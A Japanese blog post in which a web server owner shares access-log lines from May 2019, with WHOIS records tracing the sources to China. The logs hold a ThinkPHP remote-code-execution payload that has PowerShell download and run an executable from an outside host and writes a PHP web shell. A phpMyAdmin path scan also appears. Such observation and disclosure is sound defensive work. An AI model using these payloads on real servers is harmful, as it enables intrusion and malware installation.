Webサーバーログ:2019-05-22 の怪しいHTTPDログ

Webサーバーのログを見ていると、怪しさ満載のアクセス行に気付きましたので、久しぶりにご紹介。

[22/May/2019:22:06:49] - - 221.231.113.114    "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 301 -       "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe
[22/May/2019:22:06:57] - - 221.231.113.114    "GET /public/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(http://fid.hognoob.se/download.exe,%SystemRoot%/Temp/leepozjimljusrb19143.exe);start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24979       "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe
[22/May/2019:22:07:04] - - 221.231.113.114    "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 -       "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo
[22/May/2019:22:07:07] - - 221.231.113.114    "GET /public/?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20?php%20action%20=%20_GET[xcmd];system(action);?hydra.php HTTP/1.1" 404 24980       "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo
[22/May/2019:22:07:15] - - 221.231.113.114    "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24950       "http://116.58.172.107:80/public/hydra.php?xcmd=cmd.exe

/public とback slash があることからWindowsのローカルシェアをターゲットにしたもの?

アクセス元は、予想通り、中国でした。

% Information related to '221.228.0.0/14AS4134'

route:          221.228.0.0/14
descr:          CHINANET jiangsu province network
origin:         AS4134
mnt-by:         MAINT-CHINANET-JS
last-modified:  2019-02-14T06:59:24Z
source:         APNIC

以下のようなアクセスはしょっちゅうなんですけどね。

[21/May/2019:17:23:52] - - 118.31.251.34    "GET //scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:23:57] - - 118.31.251.34    "GET //phpMyAdm/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:03] - - 118.31.251.34    "GET //admin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:09] - - 118.31.251.34    "GET //admin/pma/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:15] - - 118.31.251.34    "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:21] - - 118.31.251.34    "GET //db/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:26] - - 118.31.251.34    "GET //dbadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:31] - - 118.31.251.34    "GET //dbdmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:36] - - 118.31.251.34    "GET //myadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:41] - - 118.31.251.34    "GET //mysql/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:45] - - 118.31.251.34    "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:49] - - 118.31.251.34    "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:52] - - 118.31.251.34    "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:56] - - 118.31.251.34    "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:25:01] - - 118.31.251.34    "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:25:07] - - 118.31.251.34    "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 -       "-"

こっちのアクセス元も、当然、中国。

% Information related to '118.31.0.0/16AS37963'

route:          118.31.0.0/16
descr:          Addresses from CNNIC
country:        CN
origin:         AS37963
mnt-by:         MAINT-CNNIC-AP
last-modified:  2016-07-20T02:08:05Z
source:         APNIC

どうでもいい話ですが、さらしておきます。

コメントを残す